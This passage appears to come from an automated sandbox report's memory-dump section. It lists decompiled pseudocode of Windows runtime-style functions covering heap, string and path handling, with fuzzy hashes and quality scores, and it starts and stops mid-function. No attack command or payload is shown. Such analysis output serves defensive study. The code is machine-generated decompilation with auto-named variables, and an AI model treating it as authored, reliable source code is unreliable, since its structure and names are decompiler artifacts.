                                                              									_t64 =  *(_t103 - 0x24);
                                                              									goto L5;
                                                              								}
                                                              								goto L13;
                                                              							} else {
                                                              								L5:
                                                              								_t64 = _t64 - 1;
                                                              								continue;
                                                              							}
                                                              						}
                                                              						break;
                                                              					}
                                                              					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                              					__eflags = _t102;
                                                              					if(_t102 < 0) {
                                                              						__eflags = _t102 - 0xc0000100;
                                                              						if(_t102 == 0xc0000100) {
                                                              							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                              							__eflags = _t83;
                                                              							if(_t83 != 0) {
                                                              								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                              								__eflags =  *_t83 - _t99;
                                                              								if( *_t83 == _t99) {
                                                              									_t102 = 0xc0000100;
                                                              									goto L19;
                                                              								} else {
                                                              									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                              									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                              									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                              									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                              										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                              										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                              											L26:
                                                              											_t102 = E01012AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                              											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                              											__eflags = _t102 - 0xc0000100;
                                                              											if(_t102 != 0xc0000100) {
                                                              												goto L12;
                                                              											} else {
                                                              												_t99 = 1;
                                                              												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                              												goto L18;
                                                              											}
                                                              										} else {
                                                              											_t69 = E00FF6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                              											__eflags = _t69;
                                                              											if(_t69 != 0) {
                                                              												goto L26;
                                                              											} else {
                                                              												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                              												goto L18;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										L18:
                                                              										_t102 = E01012C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                              										L19:
                                                              										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                              										goto L12;
                                                              									}
                                                              								}
                                                              								L28:
                                                              							} else {
                                                              								E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                              								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                              								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                              								_t76 = E01012AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                              								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                              								__eflags = _t76 - 0xc0000100;
                                                              								if(_t76 == 0xc0000100) {
                                                              									 *((intOrPtr*)(_t103 - 0x1c)) = E01012C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                              								}
                                                              								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                              								E01012ACB();
                                                              							}
                                                              						}
                                                              					}
                                                              					L12:
                                                              					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                              					_t62 = _t102;
                                                              				}
                                                              				L13:
                                                              				return E0103D0D1(_t62);
                                                              				goto L28;
                                                              			}






















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f584d316c7ad65b33ad8e2fba2a12075716c154d9ec49601bd0fc3bdd33b6d98
                                                              • Instruction ID: 3c0a5721987e749df8702589936c313544de06ca4f7b9a91b41dbaabddd12180
                                                              • Opcode Fuzzy Hash: f584d316c7ad65b33ad8e2fba2a12075716c154d9ec49601bd0fc3bdd33b6d98
                                                              • Instruction Fuzzy Hash: E4517C7290020ADFDF65CF99C880ADEBBB6FF48350F258055E954AB225C3399D52DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E01014D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				char _v176;
                                                              				char _v177;
                                                              				char _v184;
                                                              				intOrPtr _v192;
                                                              				intOrPtr _v196;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short _t42;
                                                              				char* _t44;
                                                              				intOrPtr _t46;
                                                              				intOrPtr _t50;
                                                              				char* _t57;
                                                              				intOrPtr _t59;
                                                              				intOrPtr _t67;
                                                              				signed int _t69;
                                                              
                                                              				_t64 = __edx;
                                                              				_v12 =  *0x10dd360 ^ _t69;
                                                              				_t65 = 0xa0;
                                                              				_v196 = __edx;
                                                              				_v177 = 0;
                                                              				_t67 = __ecx;
                                                              				_v192 = __ecx;
                                                              				E0102FA60( &_v176, 0, 0xa0);
                                                              				_t57 =  &_v176;
                                                              				_t59 = 0xa0;
                                                              				if( *0x10d7bc8 != 0) {
                                                              					L3:
                                                              					while(1) {
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t67 = _v192;
                                                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                              						_push( &_v184);
                                                              						_push(_t59);
                                                              						_push(_t57);
                                                              						_push(0xa0);
                                                              						_push(_t57);
                                                              						_push(0xf);
                                                              						_t42 = E0102B0B0();
                                                              						if(_t42 != 0xc0000023) {
                                                              							break;
                                                              						}
                                                              						if(_v177 != 0) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              						}
                                                              						_v177 = 1;
                                                              						_t44 = L01004620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                              						_t59 = _v184;
                                                              						_t57 = _t44;
                                                              						if(_t57 != 0) {
                                                              							continue;
                                                              						} else {
                                                              							_t42 = 0xc0000017;
                                                              							break;
                                                              						}
                                                              					}
                                                              					if(_t42 != 0) {
                                                              						_t65 = E00FECCC0(_t42);
                                                              						if(_t65 != 0) {
                                                              							L10:
                                                              							if(_v177 != 0) {
                                                              								if(_t57 != 0) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              								}
                                                              							}
                                                              							_t46 = _t65;
                                                              							L12:
                                                              							return E0102B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                              						}
                                                              						L7:
                                                              						_t50 = _a4;
                                                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                              						if(_t50 != 3) {
                                                              							if(_t50 == 2) {
                                                              								goto L8;
                                                              							}
                                                              							L9:
                                                              							if(E0102F380(_t67 + 0xc, 0xfc5138, 0x10) == 0) {
                                                              								 *0x10d60d8 = _t67;
                                                              							}
                                                              							goto L10;
                                                              						}
                                                              						L8:
                                                              						_t64 = _t57 + 0x28;
                                                              						E01014F49(_t67, _t57 + 0x28);
                                                              						goto L9;
                                                              					}
                                                              					_t65 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(E01014E70(0x10d86b0, 0x1015690, 0, 0) != 0) {
                                                              					_t46 = E00FECCC0(_t56);
                                                              					goto L12;
                                                              				} else {
                                                              					_t59 = 0xa0;
                                                              					goto L3;
                                                              				}
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd0fd52ddbf232c35fc19bb0fb640da21a31569ffebb47df746206402a7753ea
                                                              • Instruction ID: 99c109864635bb6914f999421aeeafe04770971febbced184886736221ef8eae
                                                              • Opcode Fuzzy Hash: fd0fd52ddbf232c35fc19bb0fb640da21a31569ffebb47df746206402a7753ea
                                                              • Instruction Fuzzy Hash: F241D271A403189FEB72DF18CC80FAABBE9EB45710F0440A9E985DB295D779DD40CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E01014BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                              				signed int _v8;
                                                              				short _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				char _v36;
                                                              				char _v156;
                                                              				short _v158;
                                                              				intOrPtr _v160;
                                                              				char _v164;
                                                              				intOrPtr _v168;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t45;
                                                              				intOrPtr _t74;
                                                              				signed char _t77;
                                                              				intOrPtr _t84;
                                                              				char* _t85;
                                                              				void* _t86;
                                                              				intOrPtr _t87;
                                                              				signed short _t88;
                                                              				signed int _t89;
                                                              
                                                              				_t83 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t89;
                                                              				_t45 = _a8 & 0x0000ffff;
                                                              				_v158 = __edx;
                                                              				_v168 = __ecx;
                                                              				if(_t45 == 0) {
                                                              					L22:
                                                              					_t86 = 6;
                                                              					L12:
                                                              					E00FECC50(_t86);
                                                              					L11:
                                                              					return E0102B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                              				}
                                                              				_t77 = _a4;
                                                              				if((_t77 & 0x00000001) != 0) {
                                                              					goto L22;
                                                              				}
                                                              				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                              				if(_t45 !=  *_t8) {
                                                              					goto L22;
                                                              				}
                                                              				_t9 = _t77 + 0x24; // 0x10d8504
                                                              				E01002280(_t9, _t9);
                                                              				_t87 = 0x78;
                                                              				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                              				E0102FA60( &_v156, 0, _t87);
                                                              				_t13 = _t77 + 0x30; // 0x3db8
                                                              				_t85 =  &_v156;
                                                              				_v36 =  *_t13;
                                                              				_v28 = _v168;
                                                              				_v32 = 0;
                                                              				_v24 = 0;
                                                              				_v20 = _v158;
                                                              				_v160 = 0;
                                                              				while(1) {
                                                              					_push( &_v164);
                                                              					_push(_t87);
                                                              					_push(_t85);
                                                              					_push(0x18);
                                                              					_push( &_v36);
                                                              					_push(0x1e);
                                                              					_t88 = E0102B0B0();
                                                              					if(_t88 != 0xc0000023) {
                                                              						break;
                                                              					}
                                                              					if(_t85 !=  &_v156) {
                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                              					}
                                                              					_t84 = L01004620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                              					_v168 = _v164;
                                                              					if(_t84 == 0) {
                                                              						_t88 = 0xc0000017;
                                                              						goto L19;
                                                              					} else {
                                                              						_t74 = _v160 + 1;
                                                              						_v160 = _t74;
                                                              						if(_t74 >= 0x10) {
                                                              							L19:
                                                              							_t86 = E00FECCC0(_t88);
                                                              							if(_t86 != 0) {
                                                              								L8:
                                                              								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                              								_t30 = _t77 + 0x24; // 0x10d8504
                                                              								E00FFFFB0(_t77, _t84, _t30);
                                                              								if(_t84 != 0 && _t84 !=  &_v156) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                              								}
                                                              								if(_t86 != 0) {
                                                              									goto L12;
                                                              								} else {
                                                              									goto L11;
                                                              								}
                                                              							}
                                                              							L6:
                                                              							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                              							if(_v164 != 0) {
                                                              								_t83 = _t84;
                                                              								E01014F49(_t77, _t84);
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t87 = _v168;
                                                              						continue;
                                                              					}
                                                              				}
                                                              				if(_t88 != 0) {
                                                              					goto L19;
                                                              				}
                                                              				goto L6;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: a811dc926a2c2ccf86ceec7854b427998a9b4e84470d16e21e168587fb18507d
                                                              • Instruction ID: 1a544d04b34171478ff2c3eb39939c490158afd98f2a558963ffe663135cf731
                                                              • Opcode Fuzzy Hash: a811dc926a2c2ccf86ceec7854b427998a9b4e84470d16e21e168587fb18507d
                                                              • Instruction Fuzzy Hash: BE419335A0022D9BDBA1DF68C940BEEB7F4FF45740F4100A5E988EB251DB799E84CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00FF8A0A(intOrPtr* __ecx, signed int __edx) {
                                                              				signed int _v8;
                                                              				char _v524;
                                                              				signed int _v528;
                                                              				void* _v532;
                                                              				char _v536;
                                                              				char _v540;
                                                              				char _v544;
                                                              				intOrPtr* _v548;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t44;
                                                              				void* _t46;
                                                              				void* _t48;
                                                              				signed int _t53;
                                                              				signed int _t55;
                                                              				intOrPtr* _t62;
                                                              				void* _t63;
                                                              				unsigned int _t75;
                                                              				signed int _t79;
                                                              				unsigned int _t81;
                                                              				unsigned int _t83;
                                                              				signed int _t84;
                                                              				void* _t87;
                                                              
                                                              				_t76 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t84;
                                                              				_v536 = 0x200;
                                                              				_t79 = 0;
                                                              				_v548 = __edx;
                                                              				_v544 = 0;
                                                              				_t62 = __ecx;
                                                              				_v540 = 0;
                                                              				_v532 =  &_v524;
                                                              				if(__edx == 0 || __ecx == 0) {
                                                              					L6:
                                                              					return E0102B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                              				} else {
                                                              					_v528 = 0;
                                                              					E00FFE9C0(1, __ecx, 0, 0,  &_v528);
                                                              					_t44 = _v528;
                                                              					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                              					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                              					_t46 = 0xa;
                                                              					_t87 = _t81 - _t46;
                                                              					if(_t87 > 0 || _t87 == 0) {
                                                              						 *_v548 = 0xfc1180;
                                                              						L5:
                                                              						_t79 = 1;
                                                              						goto L6;
                                                              					} else {
                                                              						_t48 = E01011DB5(_t62,  &_v532,  &_v536);
                                                              						_t76 = _v528;
                                                              						if(_t48 == 0) {
                                                              							L9:
                                                              							E01023C2A(_t81, _t76,  &_v544);
                                                              							 *_v548 = _v544;
                                                              							goto L5;
                                                              						}
                                                              						_t62 = _v532;
                                                              						if(_t62 != 0) {
                                                              							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                              							_t53 =  *_t62;
                                                              							_v528 = _t53;
                                                              							if(_t53 != 0) {
                                                              								_t63 = _t62 + 4;
                                                              								_t55 = _v528;
                                                              								do {
                                                              									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                              										if(E00FF8999(_t63,  &_v540) == 0) {
                                                              											_t55 = _v528;
                                                              										} else {
                                                              											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                              											_t55 = _v528;
                                                              											if(_t75 >= _t83) {
                                                              												_t83 = _t75;
                                                              											}
                                                              										}
                                                              									}
                                                              									_t63 = _t63 + 0x14;
                                                              									_t55 = _t55 - 1;
                                                              									_v528 = _t55;
                                                              								} while (_t55 != 0);
                                                              								_t62 = _v532;
                                                              							}
                                                              							if(_t62 !=  &_v524) {
                                                              								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                              							}
                                                              							_t76 = _t83 & 0x0000ffff;
                                                              							_t81 = _t83 >> 0x10;
                                                              						}
                                                              						goto L9;
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: c5d7ada47cd24e20bb21d44507b34cd5fd74ad18fd70f3d933985b85ab0160df
                                                              • Instruction ID: 48e0d54223f98fb2bc9a84741a2b3cc9c45d8137a9ba3a9f3784bdd00b2a9911
                                                              • Opcode Fuzzy Hash: c5d7ada47cd24e20bb21d44507b34cd5fd74ad18fd70f3d933985b85ab0160df
                                                              • Instruction Fuzzy Hash: A04180B1A0022D9BDB24DF15CC88BB9B7B4FF94350F1041EADA1997262EB749E81DF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E010669A6(signed short* __ecx, void* __eflags) {
                                                              				signed int _v8;
                                                              				signed int _v16;
                                                              				intOrPtr _v20;
                                                              				signed int _v24;
                                                              				signed short _v28;
                                                              				signed int _v32;
                                                              				intOrPtr _v36;
                                                              				signed int _v40;
                                                              				char* _v44;
                                                              				signed int _v48;
                                                              				intOrPtr _v52;
                                                              				signed int _v56;
                                                              				char _v60;
                                                              				signed int _v64;
                                                              				char _v68;
                                                              				char _v72;
                                                              				signed short* _v76;
                                                              				signed int _v80;
                                                              				char _v84;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t68;
                                                              				intOrPtr _t73;
                                                              				signed short* _t74;
                                                              				void* _t77;
                                                              				void* _t78;
                                                              				signed int _t79;
                                                              				signed int _t80;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t80;
                                                              				_t75 = 0x100;
                                                              				_v64 = _v64 & 0x00000000;
                                                              				_v76 = __ecx;
                                                              				_t79 = 0;
                                                              				_t68 = 0;
                                                              				_v72 = 1;
                                                              				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                              				_t77 = 0;
                                                              				if(L00FF6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                              					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                              					if(_t79 != 0 && E01066BA3() != 0) {
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0x1f0003);
                                                              						_push( &_v64);
                                                              						if(E01029980() >= 0) {
                                                              							E01002280(_t56, 0x10d8778);
                                                              							_t77 = 1;
                                                              							_t68 = 1;
                                                              							if( *0x10d8774 == 0) {
                                                              								asm("cdq");
                                                              								 *(_t79 + 0xf70) = _v64;
                                                              								 *(_t79 + 0xf74) = 0x100;
                                                              								_t75 = 0;
                                                              								_t73 = 4;
                                                              								_v60 =  &_v68;
                                                              								_v52 = _t73;
                                                              								_v36 = _t73;
                                                              								_t74 = _v76;
                                                              								_v44 =  &_v72;
                                                              								 *0x10d8774 = 1;
                                                              								_v56 = 0;
                                                              								_v28 = _t74[2];
                                                              								_v48 = 0;
                                                              								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                              								_v40 = 0;
                                                              								_v32 = 0;
                                                              								_v24 = 0;
                                                              								_v16 = 0;
                                                              								if(E00FEB6F0(0xfcc338, 0xfcc288, 3,  &_v60) == 0) {
                                                              									_v80 = _v80 | 0xffffffff;
                                                              									_push( &_v84);
                                                              									_push(0);
                                                              									_push(_v64);
                                                              									_v84 = 0xfa0a1f00;
                                                              									E01029520();
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				if(_v64 != 0) {
                                                              					_push(_v64);
                                                              					E010295D0();
                                                              					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                              					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                              				}
                                                              				if(_t77 != 0) {
                                                              					E00FFFFB0(_t68, _t77, 0x10d8778);
                                                              				}
                                                              				_pop(_t78);
                                                              				return E0102B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                              			}

































                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
                                                              • Instruction ID: 256817df2442ec42153a83f1a5856e329145d9d0a0349cb49c3b317f9dd351ac
                                                              • Opcode Fuzzy Hash: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
                                                              • Instruction Fuzzy Hash: DA419CB1D00219AFDB20CFAAC940BFEBBF8FF48714F04816AE994A7250DB359905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00FE5210(intOrPtr _a4, void* _a8) {
                                                              				void* __ecx;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              				signed int _t33;
                                                              				intOrPtr _t35;
                                                              				signed int _t52;
                                                              				void* _t54;
                                                              				void* _t56;
                                                              				unsigned int _t59;
                                                              				signed int _t60;
                                                              				void* _t61;
                                                              
                                                              				_t61 = E00FE52A5(1);
                                                              				if(_t61 == 0) {
                                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                              					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                              					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                              				} else {
                                                              					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                              					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                              				}
                                                              				_t60 = _t59 >> 1;
                                                              				_t32 = 0x3a;
                                                              				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                              					_t52 = _t60 + _t60;
                                                              					if(_a4 > _t52) {
                                                              						goto L5;
                                                              					}
                                                              					if(_t61 != 0) {
                                                              						asm("lock xadd [esi], eax");
                                                              						if((_t32 | 0xffffffff) == 0) {
                                                              							_push( *((intOrPtr*)(_t61 + 4)));
                                                              							E010295D0();
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                              						}
                                                              					} else {
                                                              						E00FFEB70(_t54, 0x10d79a0);
                                                              					}
                                                              					_t26 = _t52 + 2; // 0xddeeddf0
                                                              					return _t26;
                                                              				} else {
                                                              					_t52 = _t60 + _t60;
                                                              					if(_a4 < _t52) {
                                                              						if(_t61 != 0) {
                                                              							asm("lock xadd [esi], eax");
                                                              							if((_t32 | 0xffffffff) == 0) {
                                                              								_push( *((intOrPtr*)(_t61 + 4)));
                                                              								E010295D0();
                                                              								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                              							}
                                                              						} else {
                                                              							E00FFEB70(_t54, 0x10d79a0);
                                                              						}
                                                              						return _t52;
                                                              					}
                                                              					L5:
                                                              					_t33 = E0102F3E0(_a8, _t54, _t52);
                                                              					if(_t61 == 0) {
                                                              						E00FFEB70(_t54, 0x10d79a0);
                                                              					} else {
                                                              						asm("lock xadd [esi], eax");
                                                              						if((_t33 | 0xffffffff) == 0) {
                                                              							_push( *((intOrPtr*)(_t61 + 4)));
                                                              							E010295D0();
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                              						}
                                                              					}
                                                              					_t35 = _a8;
                                                              					if(_t60 <= 1) {
                                                              						L9:
                                                              						_t60 = _t60 - 1;
                                                              						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                              						goto L10;
                                                              					} else {
                                                              						_t56 = 0x3a;
                                                              						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                              							 *((short*)(_t52 + _t35)) = 0;
                                                              							L10:
                                                              							return _t60 + _t60;
                                                              						}
                                                              						goto L9;
                                                              					}
                                                              				}
                                                              			}















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
                                                              • Instruction ID: 77bb86fa87f3b929a0511dd2b96a96fd917581b0fb3406e5c5929008f9550dae
                                                              • Opcode Fuzzy Hash: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
                                                              • Instruction Fuzzy Hash: ED314632241A11EBC722AF29CC81BAA77A5FF10B64F104629FAD95B1A5DB30F800D790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E01023D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                              				intOrPtr _v8;
                                                              				char _v12;
                                                              				signed short** _t33;
                                                              				short* _t38;
                                                              				intOrPtr* _t39;
                                                              				intOrPtr* _t41;
                                                              				signed short _t43;
                                                              				intOrPtr* _t47;
                                                              				intOrPtr* _t53;
                                                              				signed short _t57;
                                                              				intOrPtr _t58;
                                                              				signed short _t60;
                                                              				signed short* _t61;
                                                              
                                                              				_t47 = __ecx;
                                                              				_t61 = __edx;
                                                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                              				if(_t60 > 0xfffe) {
                                                              					L22:
                                                              					return 0xc0000106;
                                                              				}
                                                              				if(__edx != 0) {
                                                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                              						L5:
                                                              						E00FF7B60(0, _t61, 0xfc11c4);
                                                              						_v12 =  *_t47;
                                                              						_v12 = _v12 + 0xfff8;
                                                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                              						E00FF7B60(0xfff8, _t61,  &_v12);
                                                              						_t33 = _a8;
                                                              						if(_t33 != 0) {
                                                              							 *_t33 = _t61;
                                                              						}
                                                              						_t12 =  &(_t61[2]); // 0x8bc4eb00
                                                              						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              						_t53 = _a12;
                                                              						if(_t53 != 0) {
                                                              							_t57 = _t61[2];
                                                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                              							while(_t38 >= _t57) {
                                                              								if( *_t38 == 0x5c) {
                                                              									_t41 = _t38 + 2;
                                                              									if(_t41 == 0) {
                                                              										break;
                                                              									}
                                                              									_t58 = 0;
                                                              									if( *_t41 == 0) {
                                                              										L19:
                                                              										 *_t53 = _t58;
                                                              										goto L7;
                                                              									}
                                                              									 *_t53 = _t41;
                                                              									goto L7;
                                                              								}
                                                              								_t38 = _t38 - 2;
                                                              							}
                                                              							_t58 = 0;
                                                              							goto L19;
                                                              						} else {
                                                              							L7:
                                                              							_t39 = _a16;
                                                              							if(_t39 != 0) {
                                                              								 *_t39 = 0;
                                                              								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                              							}
                                                              							return 0;
                                                              						}
                                                              					}
                                                              					_t61 = _a4;
                                                              					if(_t61 != 0) {
                                                              						L3:
                                                              						_t43 = L01004620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                              						_t61[2] = _t43;
                                                              						if(_t43 == 0) {
                                                              							return 0xc0000017;
                                                              						}
                                                              						_t61[1] = _t60;
                                                              						 *_t61 = 0;
                                                              						goto L5;
                                                              					}
                                                              					goto L22;
                                                              				}
                                                              				_t61 = _a4;
                                                              				if(_t61 == 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				goto L3;
                                                              			}
















                                                              0x01023d6e
                                                              0x01023d73
                                                              0x00000000
                                                              0x0105e7b5
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
                                                              • Instruction ID: 7a097eff17057702bafa377429d25248661c92e08dd662453c111c52df0c73b7
                                                              • Opcode Fuzzy Hash: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
                                                              • Instruction Fuzzy Hash: BC31AF31A04625DBDB659F2DD841A7BBBF5FF49700B0580AAE9C6CF391E638D840C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E0101A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t39;
                                                              				intOrPtr _t45;
                                                              				intOrPtr* _t51;
